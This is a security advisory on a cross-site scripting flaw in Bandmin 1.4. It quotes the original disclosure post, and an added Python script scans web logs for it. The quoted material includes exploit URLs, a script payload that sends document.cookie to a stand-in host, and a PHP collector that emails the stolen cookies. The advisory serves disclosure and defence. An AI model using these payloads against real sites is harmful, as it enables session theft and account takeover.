Bandmin Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1006873
CVE Reference: CAN-2003-0416
Updated: Jan 20 2004
Original Entry Date: May 29 2003
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Version(s): 1.4
Description: An input validation vulnerability was reported in the Bandmin bandwidth monitor. A remote user can conduct cross-site scripting attacks.
It is reported that the software does not filter HTML from user-supplied input. A remote user can create a specially crafted URL
that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will
originate from the site running Bandmin and will run in the security context of that site. As a result, the code will be able to
access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted
by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]&month=[SECOND SCRIPT]
http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=[THIRD SCRIPT]
In place of the [SCRIPT] tag, use the following [unescaped, of course]:
<script>document.location='http://any-web-site/cookies.php?'+document.cookie</script>
Then, the cookies.php script at 'any-web-site' can capture the target user's cookies.
[Editor's note: We were unable to find an active vendor web site at the time of this entry.]
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
Bandmin software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
Solution: No solution was available at the time of this entry.
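With no fix listed, one defensive option is to look in web server access logs for requests whose `year`, `month` or `host` values do not fit the expected shape. The following Python scan is an added example, not part of the original advisory or of Bandmin; the parameter shapes, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list shapes for the three parameters named in the advisory. The shapes
# are assumptions inferred from the advisory's sample values (month=May, year=2003).
ALLOWED = {
    "year": re.compile(r"[0-9]{4}"),
    "month": re.compile(r"[A-Za-z]{3,9}"),
    "host": re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?"),
}
CGI_PATH = "/bandwidth/index.cgi"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def bad_params(target):
    """Return sorted names of year/month/host values that fail the allow-list."""
    try:
        parts = urlsplit(target)
    except ValueError:  # malformed request target, nothing to inspect
        return []
    if parts.path != CGI_PATH:
        return []
    # parse_qs percent-decodes each value; blank values are kept and checked too.
    query = parse_qs(parts.query, keep_blank_values=True)
    return sorted(name for name, pattern in ALLOWED.items()
                  if any(not pattern.fullmatch(v) for v in query.get(name, [])))

def scan(log_lines):
    """Yield (line_number, client, bad_parameter_names) for flagged requests."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        bad = bad_params(match.group(1)) if match else []
        if bad:
            yield number, line.split(" ", 1)[0], bad

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/May/2003:16:40:01 +0000] "GET /bandwidth/index.cgi?action=showmonth&year=2003&month=May HTTP/1.0" 200 5120',
    '198.51.100.7 - - [28/May/2003:16:41:12 +0000] "GET /bandwidth/index.cgi?action=showmonth&year=%3Cscript%3Ealert(1)%3C/script%3E&month=May HTTP/1.0" 200 5200',
    '198.51.100.7 - - [28/May/2003:16:41:30 +0000] "GET /bandwidth/index.cgi?action=showhost&month=May&year=2003&host=%3Cb%3Ex HTTP/1.0" 200 4100',
    '192.0.2.10 - - [28/May/2003:16:42:00 +0000] "GET /bandwidth/index.cgi?action=showhost&month=May&year=2003&host=www.example.com HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for number, client, bad in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-conforming {', '.join(bad)}")
```

Values are percent-decoded once; double-encoded input is still flagged because a leftover `%` falls outside every allow-list pattern.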
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: silent needel <silentneedle@hotmail.com>
Message History:
None.
Source Message Contents
Date: 28 May 2003 16:38:40 -0000
From: silent needel <silentneedle@hotmail.com>
Subject: Bandmin 1.4 XSS Exploit
Bandmin 1.4 XSS Exploit by Silent Needle
A:BACKGROUND
Bandmin is a CGI script that shows you the bandwidth for the sites on the server.
B:DESCRIPTION
The cross site scripting allows you to print a html or javascript or others in the webpage when it just open not write in the page.
C:EXPLOIT
These are the URLs of the exploits:
1-there are two here
http://[site]/bandwidth/index.cgi?action=showmonth&year=[FIRST SCRIPT]&month=[SECOND SCRIPT]
2-one here
http://[site]/bandwidth/index.cgi?action=showhost&month=May&year=2003&host=[THIRD SCRIPT]
And you can steal cookie by changing [*** script] to
<script>document.location='http://any-web-site/cookies.php?'+document.cookie</script>
and in http://any-web-site/cookie.php put
----------------cookie.php-------------------
<?
mail("silentneedle@hotmail.com","cookies from bandmin",$http_cookie);
echo $http_cookie;
?>
-----------------------------------------------
D:GREETZ
To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , OH SHE IS A LITTLE RUN AWAY :)
E:CONTACT
Silent Needle
silentneedle@hotmail.com
F:OH LONG NIGHT
Bye